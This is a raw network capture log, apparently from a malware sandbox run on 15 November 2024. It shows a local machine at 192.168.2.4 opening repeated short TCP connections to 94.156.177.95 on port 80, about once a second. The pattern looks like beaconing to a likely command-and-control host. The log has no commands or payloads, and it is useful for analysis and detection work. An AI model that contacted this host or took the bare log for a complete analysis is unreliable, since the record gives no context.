                                                                                                                Nov 15, 2024 18:15:16.426812887 CET4986080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:16.428797960 CET4986080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:16.433655024 CET804986094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:16.433712959 CET4986080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:16.438498974 CET804986094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:17.363177061 CET804986094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:17.363461971 CET4986080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:17.368827105 CET804986094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:17.368908882 CET4986080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:17.521342993 CET4986580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:17.526283979 CET804986594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:17.526384115 CET4986580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:17.533133030 CET4986580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:17.537991047 CET804986594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:17.538065910 CET4986580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:17.542926073 CET804986594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:18.468389988 CET804986594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:18.468561888 CET4986580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:18.474006891 CET804986594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:18.474093914 CET4986580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:18.620117903 CET4986980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:18.624979973 CET804986994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:18.625065088 CET4986980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:18.628218889 CET4986980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:18.633055925 CET804986994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:18.633126020 CET4986980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:18.638026953 CET804986994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:19.607048988 CET804986994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:19.607161045 CET4986980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:19.612494946 CET804986994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:19.612555981 CET4986980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:19.752296925 CET4987580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:19.757266998 CET804987594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:19.757477999 CET4987580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:19.760445118 CET4987580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:19.765239000 CET804987594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:19.765315056 CET4987580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:19.770119905 CET804987594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:20.770309925 CET804987594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:20.770566940 CET4987580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:20.775938988 CET804987594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:20.776019096 CET4987580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:20.925477028 CET4987980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:20.930619955 CET804987994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:20.930752039 CET4987980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:20.933852911 CET4987980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:20.938893080 CET804987994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:20.938966990 CET4987980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:20.944015026 CET804987994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:21.913968086 CET804987994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:21.914705038 CET4987980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:21.920074940 CET804987994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:21.920218945 CET4987980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:22.062906981 CET4988480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:22.068015099 CET804988494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:22.068258047 CET4988480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:22.070224047 CET4988480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:22.075076103 CET804988494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:22.075165033 CET4988480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:22.080008984 CET804988494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:23.029581070 CET804988494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:23.029911041 CET4988480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:23.035295010 CET804988494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:23.035510063 CET4988480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:23.170898914 CET4988880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:23.175822020 CET804988894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:23.175893068 CET4988880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:23.178268909 CET4988880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:23.183150053 CET804988894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:23.183307886 CET4988880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:23.188147068 CET804988894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:24.542594910 CET804988894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:24.551139116 CET4988880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:24.556824923 CET804988894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:24.557250977 CET4988880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:24.792871952 CET4989580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:24.797955036 CET804989594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:24.798085928 CET4989580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:24.801156044 CET4989580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:24.806076050 CET804989594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:24.806145906 CET4989580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:24.811108112 CET804989594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:25.761615992 CET804989594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:25.761835098 CET4989580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:25.767137051 CET804989594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:25.767213106 CET4989580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:25.913006067 CET4990080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:26.042778015 CET804990094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:26.043028116 CET4990080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:26.045871019 CET4990080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:26.050766945 CET804990094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:26.050868034 CET4990080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:26.055706978 CET804990094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:27.028803110 CET804990094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:27.028959990 CET4990080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:27.034568071 CET804990094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:27.034645081 CET4990080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:27.192898989 CET4990580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:27.197841883 CET804990594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:27.198071003 CET4990580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:27.202425957 CET4990580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:27.207267046 CET804990594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:27.207350969 CET4990580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:27.212131023 CET804990594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:28.160433054 CET804990594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:28.161345959 CET4990580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:28.166501045 CET804990594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:28.166551113 CET4990580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:28.316482067 CET4991180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:28.321474075 CET804991194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:28.321561098 CET4991180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:28.323595047 CET4991180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:28.328593969 CET804991194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:28.328660965 CET4991180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:28.333580971 CET804991194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:29.272986889 CET804991194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:29.273082972 CET4991180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:29.278461933 CET804991194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:29.278522015 CET4991180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:29.430964947 CET4991880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:29.435877085 CET804991894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:29.436100960 CET4991880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:29.439150095 CET4991880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:29.443953991 CET804991894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:29.444036007 CET4991880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:29.448923111 CET804991894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:30.400077105 CET804991894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:30.400379896 CET4991880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:30.406276941 CET804991894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:30.406358957 CET4991880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:30.545799971 CET4992380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:30.550962925 CET804992394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:30.551075935 CET4992380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:30.553162098 CET4992380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:30.558265924 CET804992394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:30.558346033 CET4992380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:30.563545942 CET804992394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:32.028471947 CET804992394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:32.028610945 CET4992380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:32.033879042 CET804992394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:32.033950090 CET4992380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:32.172832012 CET4993280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:32.178314924 CET804993294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:32.178414106 CET4993280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:32.180358887 CET4993280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:32.185190916 CET804993294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:32.185276031 CET4993280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:32.190172911 CET804993294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:33.186584949 CET804993294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:33.186722994 CET4993280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:33.192061901 CET804993294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:33.192136049 CET4993280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:33.330781937 CET4993680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:33.335686922 CET804993694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:33.335887909 CET4993680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:33.338016033 CET4993680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:33.342878103 CET804993694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:33.342989922 CET4993680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:33.347816944 CET804993694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:34.312840939 CET804993694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:34.312997103 CET4993680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:34.318228960 CET804993694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:34.318326950 CET4993680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:34.449246883 CET4994280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:34.454062939 CET804994294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:34.454139948 CET4994280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:34.456140995 CET4994280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:34.460957050 CET804994294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:34.461021900 CET4994280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:34.465934992 CET804994294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:35.454488039 CET804994294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:35.454641104 CET4994280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:35.460047960 CET804994294.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:35.460144043 CET4994280192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:35.594315052 CET4994980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:35.599422932 CET804994994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:35.599538088 CET4994980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:35.601607084 CET4994980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:35.606766939 CET804994994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:35.606842041 CET4994980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:35.611757994 CET804994994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:36.557085037 CET804994994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:36.557200909 CET4994980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:36.562589884 CET804994994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:36.562678099 CET4994980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:36.922091961 CET4995680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:36.927107096 CET804995694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:36.927181005 CET4995680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:36.934304953 CET4995680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:36.942770004 CET804995694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:36.942826986 CET4995680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:36.952189922 CET804995694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:37.889698029 CET804995694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:37.893726110 CET4995680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:37.899106979 CET804995694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:37.899164915 CET4995680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:38.026782036 CET4996580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:38.033514977 CET804996594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:38.033602953 CET4996580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:38.035571098 CET4996580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:38.040489912 CET804996594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:38.040555954 CET4996580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:38.045456886 CET804996594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:39.001919985 CET804996594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:39.002080917 CET4996580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:39.007797003 CET804996594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:39.007873058 CET4996580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:39.146599054 CET4997180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:39.152496099 CET804997194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:39.152576923 CET4997180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:39.154721022 CET4997180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:39.160283089 CET804997194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:39.160355091 CET4997180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:39.165970087 CET804997194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:40.095613956 CET804997194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:40.095783949 CET4997180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:40.101073980 CET804997194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:40.101157904 CET4997180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:40.244827986 CET4997880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:40.249761105 CET804997894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:40.249866009 CET4997880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:40.252780914 CET4997880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:40.257673979 CET804997894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:40.257744074 CET4997880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:40.262660980 CET804997894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:41.246045113 CET804997894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:41.246344090 CET4997880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:41.252279043 CET804997894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:41.252468109 CET4997880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:41.390011072 CET4998580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:41.394961119 CET804998594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:41.395042896 CET4998580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:41.397134066 CET4998580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:41.402314901 CET804998594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:41.402378082 CET4998580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:41.407305956 CET804998594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:42.357958078 CET804998594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:42.358174086 CET4998580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:42.363348961 CET804998594.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:42.363455057 CET4998580192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:42.511058092 CET4999180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:42.515870094 CET804999194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:42.515990019 CET4999180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:42.519032001 CET4999180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:42.523947954 CET804999194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:42.524039984 CET4999180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:42.528822899 CET804999194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:43.495873928 CET804999194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:43.496053934 CET4999180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:43.501297951 CET804999194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:43.501354933 CET4999180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:43.635874987 CET4999880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:43.641011953 CET804999894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:43.641093969 CET4999880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:43.643137932 CET4999880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:43.648040056 CET804999894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:43.648108959 CET4999880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:43.653095961 CET804999894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:44.607532978 CET804999894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:44.609400988 CET4999880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:44.614598036 CET804999894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:44.614732981 CET4999880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:44.745280027 CET5000380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:44.750324011 CET805000394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:44.751250982 CET5000380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:44.753181934 CET5000380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:44.758002043 CET805000394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:44.761342049 CET5000380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:44.766223907 CET805000394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:45.715318918 CET805000394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:45.720876932 CET5000380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:45.725987911 CET805000394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:45.726058006 CET5000380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:45.871941090 CET5001080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:45.876799107 CET805001094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:45.876921892 CET5001080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:45.879076004 CET5001080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:45.883858919 CET805001094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:45.883898973 CET5001080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:45.888776064 CET805001094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:47.222376108 CET805001094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:47.222538948 CET5001080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:47.228182077 CET805001094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:47.228260040 CET5001080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:47.355736971 CET5001680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:47.360826015 CET805001694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:47.360965967 CET5001680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:47.362961054 CET5001680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:47.367861986 CET805001694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:47.367954969 CET5001680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:47.372833014 CET805001694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:48.319152117 CET805001694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:48.320341110 CET5001680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:48.325705051 CET805001694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:48.325784922 CET5001680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:48.511102915 CET5002180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:48.516047955 CET805002194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:48.516138077 CET5002180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:48.518177032 CET5002180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:48.523111105 CET805002194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:48.523171902 CET5002180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:48.527973890 CET805002194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:49.483989954 CET805002194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:49.484132051 CET5002180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:49.489768982 CET805002194.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:49.489847898 CET5002180192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:49.619949102 CET5002680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:49.624797106 CET805002694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:49.624871969 CET5002680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:49.626610041 CET5002680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:49.631448030 CET805002694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:49.631500006 CET5002680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:49.636300087 CET805002694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:51.299175024 CET805002694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:51.299264908 CET5002680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:51.299652100 CET805002694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:51.299684048 CET805002694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:51.299700975 CET5002680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:51.299716949 CET5002680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:51.301553011 CET805002694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:51.301599979 CET5002680192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:51.307216883 CET805002694.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:51.432840109 CET5003080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:51.437870026 CET805003094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:51.437956095 CET5003080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:51.439925909 CET5003080192.168.2.494.156.177.95
